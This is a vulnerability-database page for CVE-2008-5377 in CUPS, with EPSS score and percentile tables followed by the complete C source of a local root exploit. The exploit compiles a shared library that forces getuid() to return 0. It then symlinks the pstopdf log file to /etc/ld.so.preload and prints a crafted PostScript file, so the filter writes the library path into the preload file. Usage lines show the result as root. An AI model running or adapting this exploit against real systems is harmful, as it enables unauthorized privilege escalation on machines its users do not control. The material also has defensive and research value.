CVE-2008-5377 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.76%	–	–
2022-03-27	–	–	1.76%	–	–
2022-04-03	–	–	1.76%	–	–
2022-04-17	–	–	1.76%	–	–
2022-08-28	–	–	1.76%	–	–
2023-03-05	–	–	1.76%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.19%
2025-03-30	–	–	–	–	0.19%
2025-03-30	–	–	–	–	0.19,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	54%
2022-03-27	55%
2022-04-03	74%
2022-04-17	75%
2022-08-28	76%
2023-03-05	77%
2023-03-12	–
2024-06-02	–
2025-01-19	–
2025-03-18	39%
2025-03-30	38%
2025-03-30	38%

/* * cve-2008-5377.c * * CUPS < 1.3.8-4 pstopdf filter exploit * Jon Oberheide <jon@oberheide.org> * http://jon.oberheide.org * * Usage: * * $ gcc cve-2008-5377.c -o cve-2008-5377.c * $ ./cve-2008-5377 * $ id * uid=0(root) gid=1000(vm) ... * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377 * * pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via * a symlink attack on the /tmp/pstopdf.log temporary file. * * Operation: * * The exploit creates and prints a malformed postscript document that will * cause the CUPS pstopdf filter to write an error message out to its log * file that contains the string /tmp/getuid.so. However, since we also * symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the * error message and malicious shared library path will be appended to the * ld.so.preload file, allowing us to elevate privileges to root. * * Note: * * This exploit only works under the (rare) conditions that cupsd executes * external filters as a privileged user, a printer on the system uses the * pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload * must be world readable. */ #include <stdio.h> #include <stdlib.h> #include <strings.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/wait.h> int main(void) { int ret; FILE *fp; struct stat log; fp = fopen("/tmp/cve-2008-5377.ps", "w"); if(!fp) { printf("error: cannot open /tmp/cve-2008-5377.ps\n"); goto cleanup; } fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n"); fclose(fp); fp = fopen("/tmp/getuid.c", "w"); if(!fp) { printf("error: cannot open /tmp/getuid.c\n"); goto cleanup; } fprintf(fp, "int getuid(){return 0;}\n"); fclose(fp); ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so"); if (WEXITSTATUS(ret) != 0) { printf("error: cannot compile /tmp/getuid.c\n"); goto cleanup; } unlink("/tmp/pstopdf.log"); ret = stat("/tmp/pstopdf.log", &log); if (ret != -1) { printf("error: /tmp/pstopdf.log already exists\n"); goto cleanup; } ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log"); if (ret == -1) { printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n"); goto cleanup; } ret = system("lp < /tmp/cve-2008-5377.ps"); if (WEXITSTATUS(ret) != 0) { printf("error: could not print /tmp/cve-2008-5377.ps\n"); goto cleanup; } cleanup: unlink("/tmp/cve-2008-5377.ps"); unlink("/tmp/getuid.c"); return 0; } // milw0rm.com [2008-12-22]